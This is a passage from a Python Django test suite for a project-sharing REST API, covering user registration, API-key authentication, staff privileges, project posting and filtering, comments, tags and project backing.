return urlresolvers.reverse('api_dispatch_list', kwargs={'api_name': self.api_name, 'resource_name': resource_name})
def resourcePK(self, resource_uri):
match = urlresolvers.resolve(resource_uri)
return match.kwargs['pk']
def resourceDetailURI(self, resource_name, resource_pk):
return urlresolvers.reverse('api_dispatch_detail', kwargs={'api_name': self.api_name, 'resource_name': resource_name, 'pk': resource_pk})
def fullURItoAbsoluteURI(self, uri):
scheme, netloc, path, query, fragment = urlparse.urlsplit(uri)
return urlparse.urlunsplit((None, None, path, query, fragment))
def add_user(self, email=None, first_name=None, last_name=None):
""" Add users
Need all 3 optionals.s """
# Allow ability to add an email from tests
if email==None:
email = 'bob@example.com'
if first_name==None:
first_name = 'bob'
if last_name==None:
last_name = 'roberts'
# Register a new user
resp = self.c.post(reverse('registration_register'),
data={'email': email,
'first_name' : first_name, 'last_name' : last_name,
'organisation' : 'org', 'team' : 'team',
'password1': 'test_password', 'password2': 'test_password',
'tos': True})
# Get the profile of our new user to access the ACTIVATION key
profile = RegistrationProfile.objects.get(user__email=email)
# And now activate the profile using the activation key
resp = self.client.get(reverse('registration_activate',
args=(),
kwargs={'activation_key': profile.activation_key}))
# Give all other tests access to the user and API key
user = User.objects.get(email=email)
api_key = user.api_key.key
return user, api_key
def build_headers(self, user, api_key):
""" Build request headers for calls requiring authentication """
headers={"HTTP_AUTHORIZATION":"ApiKey %s:%s"%(user.username, api_key)}
return headers
def give_privileges(self, user, priv):
""" makes the user superuser | staff """
if priv.lower() == 'staff':
user.is_staff = True
elif priv.lower() == 'superuser':
user.is_superuser = True
else:
print 'failed to set privileges (%s) for user %' %(priv, user)
user.save()
return user
#------------------------------------------------------------------------------------------------------------
#@utils.override_settings(DEBUG=True)
class Test_Basic_Authentication_Functions(Test_Authentication_Base):
"""
Tests that clients can authenticate properly.
"""
def setUp(self):
# Add a user and build API key header
self.user_id, self.api_key = self.add_user()
self.headers = self.build_headers(self.user_id, self.api_key)
def test_no_auth_required_on_GET(self):
""" Authentication block on a post request """
# Don't actually use the headers in the call
response = self.c.get(self.resourceListURI('project'))
if settings.ANONYMOUS_VIEWING == True:
self.assertEquals(response.status_code, 200)
else:
self.assertEquals(response.status_code, 401)
def test_auth_block_a_POST(self):
""" Authentication block on a post request """
# Don't actually use the headers in the call
data = {"title": "This project will never stick...",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"classification" : "public",
"descriptor" : "private"
}}
response = self.c.post(self.resourceListURI('project'), data=json.dumps(data), content_type='application/json')
self.assertEquals(response.status_code, 401)
def test_auth_block_a_non_staff_POST(self):
""" Authorization blocks a POST request by a non-staff user """
# Don't actually use the headers in the call
data = {"title": "This project will never stick...",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"classification" : "public",
"descriptor" : "private"
}}
response = self.c.post(self.resourceListURI('project'), data=json.dumps(data), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 401)
def test_auth_allow_staff_POST(self):
""" Authorization allows POST by staff user """
user_id, api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(user_id, priv='staff')
headers = self.build_headers(user_id, api_key)
# Don't actually use the headers in the call
data = {"title": "This project will never stick...",
"description": "First project description in here.",
"status":"published",
"related_ideas":["xcxcxcxcxcxcxcxcxcxcxcxcxcxcx", "xcxcxcxcxcxcxcxcxcxcxcxcxcxcx"],
"protective_marking" : {"classification" : "public",
"descriptor" : "private"
}}
response = self.c.post(self.resourceListURI('project'), data=json.dumps(data), content_type='application/json', **headers)
self.assertEquals(response.status_code, 201)
#------------------------------------------------------------------------------------------------------------
#@utils.override_settings(DEBUG=True)
class Test_Simple_GET_Project_API(Test_Authentication_Base):
def setUp(self):
""" Insert documents to start with"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
response = self.c.get(self.resourceListURI('project'), **self.headers)
self.assertEquals(response.status_code, 200)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
docs = [{"title": "The first project.",
"description": "First project description in here.",
"status":"published",
"protective_marking" : self.pm },
{"title": "The second project.",
"description": "Second project description in here.",
"status":"published",
"protective_marking" : self.pm }
]
# Store the responses
self.doc_locations = []
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
def test_get_to_check_failure_anon(self):
""" Test to check that new status code isn't backwards breaking"""
url = '/api/v1/project/?data_level=more&limit=3&offset=0&order_by=-created&status=published'
response = self.c.get(url)
self.assertEquals(response.status_code, 200)
def test_get_to_check_failure_authenticated(self):
""" Test to check that new status code isn't backwards breaking for authenticated user"""
url = '/api/v1/project/?data_level=more&limit=3&offset=0&order_by=-created&status=published'
response = self.c.get(url, **self.headers)
self.assertEquals(response.status_code, 200)
def test_get_to_check_failure_authenticated_admin(self):
""" Test to check that new status code isn't backwards breaking for authenticated ADMIN user"""
user_id, api_key = self.add_user()
user = self.give_privileges(user_id, priv='staff')
headers = self.build_headers(user_id, api_key)
url = '/api/v1/project/?data_level=more&limit=3&offset=0&order_by=-created&status=published'
response = self.c.get(url, **headers)
self.assertEquals(response.status_code, 200)
def test_get_all_projects(self):
""" Retrieve all projects """
response = self.c.get(self.resourceListURI('project'), **self.headers)
self.assertEquals(response.status_code, 200)
meta, content = self.get_meta_and_objects(response)
self.assertEquals(meta['total_count'], 2)
self.assertEquals(len(content), 2)
#TODO: Sort out xml tests
def test_get_xml_list(self):
""" Get an xml representation
This will ERROR rather than FAIL if it doesn't succeed."""
response = self.c.get('/api/%s/project/?format=xml'%(self.api_name), **self.headers)
self.assertEquals(response.status_code, 200)
xml = parseString(response.content)
def test_get_xml_list_fail(self):
""" Get an xml representation - fails on content """
response = self.c.get('/api/%s/project/?format=xml'%(self.api_name), **self.headers)
self.assertEquals(response.status_code, 200)
self.assertRaises(ExpatError, parseString, response.content+'<hello world')
def test_get_csv_list(self):
""" Get an xml representation - fails on content """
response = self.c.get('/api/%s/project/?format=csv'%(self.api_name), **self.headers)
self.assertEquals(response.status_code, 200)
lines = response.content.split('\n')
self.assertEquals(len(lines), 4)
# Split up each line
line_items = []
for line in lines:
line = line.split(',')
line_items.append(line)
# Check that each of the lines is the same length
for i in range(len(line_items)-2):
self.assertEquals(len(line_items[i]), len(line_items[i+1]))
def test_get_wrong_resource(self):
""" Fail to retrieve resource because of incorrect name """
response = self.c.get('/api/%s/projectx'%(self.api_name), **self.headers)
self.assertEquals(response.status_code, 404)
def test_get_1_project(self):
""" Retrieve 1 project """
pk = self.doc_locations[1].rstrip('/').split('/')[-1]
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 200)
def test_get_no_project(self):
""" Fail to retrieve an project """
pk = self.doc_locations[1].rstrip('/').split('/')[-1] + '_fake'
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 404)
#------------------------------------------------------------------------------------------------------------
#@utils.override_settings(DEBUG=True)
class Test_Simple_GET_Project_specifics(Test_Authentication_Base):
def setUp(self):
""" Insert documents to start with"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
response = self.c.get(self.resourceListURI('project'), **self.headers)
self.assertEquals(response.status_code, 200)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
docs = [{"title": "The first project.",
"description": "First project description in here.",
"protective_marking" : self.pm,
"status":"published",
"tags" : ["project", "physics"]
},
{"title": "The second project.",
"description": "Second project description in here.",
"protective_marking" : self.pm,
"status":"published",
"tags" : ["project", "another_tag"]
}
]
# Store the responses
self.doc_locations = []
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
def test_get_project_tag_list(self):
""" Check that the tag list works OK """
pk = self.doc_locations[1].rstrip('/').split('/')[-1]
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 200)
data = json.loads(response.content)['objects'][0]
self.assertEquals(data['tags'], ['project','another_tag'])
def test_get_project_detail_check_meta_mx_pm(self):
""" Checks that the detail levell has a meta.max_pm object """
pk = self.doc_locations[1].rstrip('/').split('/')[-1]
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 200)
meta, objects = self.get_meta_and_objects(response)
self.assertTrue(meta.has_key('max_pm'))
def test_get_project_detail_check_meta_modified(self):
""" Checks that the detail levell has a meta.modified object """
pk = self.doc_locations[1].rstrip('/').split('/')[-1]
response = self.c.get(self.resourceDetailURI('project', pk), **self.headers)
self.assertEquals(response.status_code, 200)
meta, objects = self.get_meta_and_objects(response)
self.assertTrue(meta.has_key('modified'))
#@utils.override_settings(DEBUG=True)
class Test_Filtered_GET_Project_API(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
# 2 more users
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
user_id3, api_key3 = self.add_user(email='sue@sue.com', first_name='sue', last_name='mcgrew')
self.headers3 = self.build_headers(user_id3, api_key3)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
""" Insert documents to start with"""
docs = [{"title": "The first project.",
"description": "First project description in here.",
"tags" : ["physics","maths","geography","sports","english"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The second project.",
"description": "second project description in here.",
"tags" : ["physics","maths","geography","sports"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The third project.",
"description": "third project description in here.",
"tags" : ["physics","maths","geography"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Forth project.",
"description": "forth project description in here.",
"tags" : ["physics","maths"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Fifth project.",
"description": "fifth project description in here.",
"tags" : ["physics", "history"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": []},
{"title": "The Sixth project.",
"description": "fifth project description in here.",
"tags" : ["history", "design"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": []}
]
# Store the responses
self.doc_locations = []
x = 0
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
project_url = response['location']
backs_uri = project_url + 'backs/'
backs = [{"comment" : {"title":"very good project. I support."}}]
for back in backs:
back_resp = self.c.post(backs_uri, json.dumps(back), content_type='application/json', **self.headers2)
self.assertEquals(back_resp.status_code, 201)
comments_uri = project_url + 'comments/'
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
for i in range(x):
comment_resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers3)
self.assertEquals(comment_resp.status_code, 201)
x += 1
time.sleep(1)
response = self.c.get(self.resourceListURI('project')+'?data_level=less', **self.headers)
def test_filter_by_comment_count_GTE(self):
""" GTE filter on comment count """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?comment_count__gte=3', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 4)
self.assertEqual(meta['total_count'], 4)
def test_filter_by_comment_count_LTE(self):
""" less than or eq filter on comment_count """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?comment_count__lte=2', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_filter_by_1tag_all_doc(self):
""" Tag Filter - catch all documents with 1 tag """
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english']
response = self.c.get(self.resourceListURI('project')+'?data_level=less&tags=physics', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 5)
self.assertEqual(meta['total_count'], 5)
def test_filter_by_1tag_1_doc(self):
""" Range filter on comment count """
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english']
response = self.c.get(self.resourceListURI('project')+'?data_level=more&tags=english', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 1)
self.assertEqual(meta['total_count'], 1)
def test_filter_by_1tag_1_doc_exact(self):
""" Range filter on comment count """
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english']
response = self.c.get(self.resourceListURI('project')+'?data_level=more&tags=english', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 1)
self.assertEqual(meta['total_count'], 1)
def test_filter_by_multiple_tags_OR(self):
""" There is 1 doc with an english tag and 1 with a history tag. This should get those 2. """
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english', 'history']
response = self.c.get(self.resourceListURI('project')+'?data_level=less&tags__in=english,history', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 3)
self.assertEqual(meta['total_count'], 3)
def test_filter_by_multiple_tags_check_post_sorting(self):
""" A list of tags in the q parameter matches exactly
the code for this is a modification that sorts the results of an __in query"""
# Retrieve all results
tags = ['physics', 'maths', 'geography', 'sports', 'english', 'history']
response = self.c.get(self.resourceListURI('project')+'?data_level=less&tags__in=physics,history,design', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 6)
self.assertEqual(meta['total_count'], 6)
self.assertEquals(objects[0]['tags'], ["physics","history"])
self.assertEquals(objects[1]['tags'], ["history","design"])
#@utils.override_settings(DEBUG=True)
class Test_Filtered_GET_Project_API_modified_status(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
""" Insert documents to start with"""
docs = [{"title": "The first project.",
"description": "First project description in here.",
"tags" : ["physics","maths","geography","sports","english"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The second project.",
"description": "second project description in here.",
"tags" : ["physics","maths","geography","sports"],
"protective_marking":self.pm,
"status" : "published",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The third project.",
"description": "third project description in here.",
"tags" : ["physics","maths","geography"],
"protective_marking":self.pm,
"status" : "draft",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Forth project.",
"description": "forth project description in here.",
"tags" : ["physics","maths"],
"protective_marking":self.pm,
"status" : "draft",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Fifth project.",
"description": "fifth project description in here.",
"tags" : ["physics", "history"],
"protective_marking":self.pm,
"status" : "hidden",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
{"title": "The Sixth project.",
"description": "fifth project description in here.",
"tags" : ["history", "design"],
"protective_marking":self.pm,
"status" : "deleted",
"related_ideas": ["xsft64kxj312n47jodam47o","xsft64kxj312n47jodam47o"]},
]
# Store the responses
self.doc_locations = []
x = 0
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
def test_staff_filter_by_status_published(self):
""" Get projects which have been published -accessed by staff user """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=published', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_filter_by_status_published(self):
""" Get projects which have been published - accessed by non-staff user"""
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=published', **self.headers2)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_staff_filter_by_status_draft(self):
""" Get projects which have been draft """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=draft', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_staff_filter_by_status_deleted(self):
""" Get projects which have been deleted """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=deleted', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 1)
self.assertEqual(meta['total_count'], 1)
def test_staff_filter_by_status_hidden(self):
""" Get projects which have been hidden """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status=hidden', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 1)
self.assertEqual(meta['total_count'], 1)
def test_staff_filter_by_status_multiple(self):
""" Get projects by status using status__in syntax """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status__in=published,draft', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 4)
self.assertEqual(meta['total_count'], 4)
def test_staff_filter_by_status_multiple_2(self):
""" Get projects by status using status__in syntax """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status__in=hidden,deleted', **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
def test_non_staff_filter_by_status_multiple_2(self):
""" Get projects by status using status__in syntax """
# Retrieve all results
response = self.c.get(self.resourceListURI('project')+'?status__in=hidden,deleted', **self.headers2)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 0)
self.assertEqual(meta['total_count'], 0)
def test_no_status_provided(self):
""" Non-authoring user can only see objects with a published status """
diff_user, diff_user_api_key = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
diff_headers = self.build_headers(diff_user, diff_user_api_key)
# Retrieve all results
response = self.c.get(self.resourceListURI('project'), **diff_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(len(objects), 2)
self.assertEqual(meta['total_count'], 2)
#@utils.override_settings(DEBUG=True)
class Test_POST_Project_API(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
self.user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3,
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"]
}
def test_POST_simple(self):
doc = {"title": "The first project.",
"description": "First project description in here.",
"created" : "2013-01-01T00:00:00",
"protective_marking" : self.pm,
"status":"published",
"related_ideas": []
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta = json.loads(response.content)['meta']
objects = json.loads(response.content)['objects']
# Top level checks
self.assertEquals(meta['total_count'], 1)
self.assertEquals(len(objects), 1)
def test_POST_simple_usercheck(self):
""" Test that created and user get automatically added"""
doc = {"title": "The project.",
"description": "Project description in here.",
"status":"published",
"protective_marking" : self.pm,
"related_ideas":[]}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
# Field checks
self.assertTrue(datetime.datetime.strptime(objects[0]['created'], '%Y-%m-%dT%H:%M:%S.%f') < datetime.datetime.utcnow())
self.assertEquals(objects[0]['user'], self.user.username)
def test_PUT_simple(self):
# POST a document
doc = {"title": "The first project.",
"description": "First project description in here.",
"status":"published",
"protective_marking" : self.pm,
"related_ideas":[]
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
project1_url = response['location']
# PUT another document using the
new_title = {"title":"the first project, much improved.",
"status":"published",
"protective_marking" : self.pm
}
response = self.c.put(project1_url, json.dumps(new_title), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 204)
def test_POST_add_comments(self):
# POST a document
doc = {"title": "The first project.",
"description": "First project description in here.",
"created" : "2013-01-01T00:00:00",
"protective_marking" : self.pm,
"status" : "published",
"related_ideas":[]}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Check it's there and there is 1 comment
main_project = response['location']
# Now check its there via URL
# Without the trailing slash results in 301 status_code
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
comment_1 = comments_uri + '100/'
response = self.c.get(comment_1, **self.headers)
self.assertEquals(response.status_code, 404)
# Try adding a new comment
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
new_comment_uri = resp['location']
# Now make sure there are 3 comments
response = self.c.get(comments_uri, **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(meta['total_count'], 1)
self.assertEquals(objects[0]['user'], self.user.username)
def test_POST_add_comment_to_unpublished_project(self):
""" Comments are only permitted against projects with status=published
This checks that a comment will fail where status=draft"""
# POST a document
doc = {"title": "The first project.",
"description": "First project description in here.",
"created" : "2013-01-01T00:00:00",
"protective_marking" : self.pm,
"status" : "draft",
"related_ideas":[]}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Check it's there and there is 1 comment
main_project = response['location']
# Now check its there via URL
# Without the trailing slash results in 301 status_code
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
comment_1 = comments_uri + '100/'
response = self.c.get(comment_1, **self.headers)
self.assertEquals(response.status_code, 404)
# Try adding a new comment
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers2)
self.assertEquals(resp.status_code, 400)
self.assertEquals(json.loads(resp.content)['error'], 'User can only comment on projects with status=published.')
## Add some more tags
"""
In shifting from an embeddedfieldlist to a simple list(string()) field
for tags, I've dropped the ability to POST/PUT/PATCH the tags array.
To edit the tags, the client has to extract the entire document (or the editable parts)
and then PUT the new document back (which includes the tags).
"""
#@utils.override_settings(DEBUG=True)
class Test_GET_tags(Test_Authentication_Base):
def setUp(self):
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
def test_get_tag_list(self):
""" Tests retrieval of tags"""
# Insert a bunch of docs with different tag combinations
docs = [{"title": "First project.", "status":"published", "tags" : ["project", "projectworks", "physics", "rugby"]},
{"title": "Second project.", "status":"published", "tags" : ["project", "projectworks", "physics"]},
{"title": "Second project.", "status":"published", "tags" : ["project", "projectworks"]},
{"title": "Third project.", "status":"published", "tags" : ["project"]}]
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Check there are 4 tags total
response = self.c.get(self.resourceListURI('tag'), **self.headers)
tags = json.loads(response.content)['objects']
self.assertEquals(len(tags), 4)
def test_get_tag_list_order_by_default(self):
""" Tests retrieval of tags with an extra aggregate term for sorting."""
# Insert a bunch of docs with different tag combinations
docs = [{"title": "First project.","status":"published", "tags" : ["project", "projectworks", "physics", "rugby"]},
{"title": "Second project.","status":"published", "tags" : ["project", "projectworks", "physics"]},
{"title": "Second project.","status":"published", "tags" : ["project", "projectworks"]},
{"title": "Third project.","status":"published", "tags" : ["project"]}]
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Check the specific ordering of the tags
response = self.c.get(self.resourceListURI('tag'), **self.headers)
tags = json.loads(response.content)['objects']
self.assertEquals(tags[0]['text'], 'project')
self.assertEquals(tags[1]['text'], 'projectworks')
self.assertEquals(tags[2]['text'], 'physics')
self.assertEquals(tags[3]['text'], 'rugby')
def test_get_tag_list_status_single_filter(self):
""" Filter which documents get read for tags based on status."""
# Insert a bunch of docs with different tag combinations
docs = [{"title": "First project.", "status" : "draft", "tags" : ["project", "projectworks", "physics", "rugby"]},
{"title": "Second project.", "status" : "published", "tags" : ["project", "projectworks", "physics"]},
{"title": "Second project.", "status" : "hidden", "tags" : ["project", "projectworks"]},
{"title": "Third project.", "status" : "deleted", "tags" : ["project"]}]
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
# Check the specific ordering of the tags
params = '?status=hidden'
response = self.c.get(self.resourceListURI('tag')+params, **self.headers)
tags = json.loads(response.content)['objects']
self.assertEquals(len(tags), 2)
def test_get_tag_list_status_multiple_statuses(self):
""" Filter which documents get read for tags based on status."""
# Insert a bunch of docs with different tag combinations
docs = [{"title": "First project.", "status" : "draft", "tags" : ["project", "projectworks", "physics", "rugby"]},
{"title": "Second project.", "status" : "published", "tags" : ["project", "projectworks", "physics"]},
{"title": "Second project.", "status" : "hidden", "tags" : ["project", "projectworks"]},
{"title": "Third project.", "status" : "deleted", "tags" : ["new_project_tag"]}]
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEqual(response.status_code, 201)
resp = self.c.get(self.resourceListURI('project'))
# Check the specific ordering of the tags
params = '?status=hidden,deleted'
response = self.c.get(self.resourceListURI('tag')+params, **self.headers)
tags = json.loads(response.content)['objects']
self.assertEquals(len(tags), 3)
#@utils.override_settings(DEBUG=True)
class Test_Back_Actions(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
self.user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
self.user_id2, self.api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(self.user_id2, self.api_key2)
# Add a doc
doc = {"title" : "First project.",
"description" : "This is the first project in a series of good projects.",
"status" : "published",
"related_ideas" : []}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.resource_uri = response['location']
self.assertEqual(response.status_code, 201)
def test_attempt_to_back_a_draft_project(self):
""" Code should stop the user attempting to backing a draft project - only allowed on published."""
# Change that project status to be draft via the db directly
id = self.resource_uri.strip('/').split('/')[-1]
doc = documents.Project.objects.get(id=id).update(**{'set__status':'draft'})
# Without the trailing slash results in 301 status_code
backs_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
# Try adding a new comment
response = self.c.post(backs_uri, json.dumps({"comment" : {"title":"very good project. I support."}}), content_type='application/json', **self.headers2)
# Now make sure there are 3 comments
self.assertEquals(response.status_code, 400)
def test_back_a_project_catch_single_user(self):
""" As the same user, attempt to back a project twice
and fail to do so. Resultant back array remains 1 long."""
# Without the trailing slash results in 301 status_code
backing_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
# Try adding a new comment
# No user provided - picked up automatically
new_backings = [{"comment" : {"title":"very good project. I support."}},
{"comment" : {"title": "ditto - great project."}}]
for back in new_backings:
self.c.post(backing_uri, json.dumps(back), content_type='application/json', **self.headers2)
# Now make sure there are 3 comments
response = self.c.get(backing_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(len(content), 1)
self.assertEquals(content[0]['user'], self.user_id2.username)
# Make sure the back count is correct
response = self.c.get(self.resource_uri, **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['back_count'], 1)
def test_back_a_project_2_users(self):
""" userA backs an project. UserA tries to back it again - it should fail.
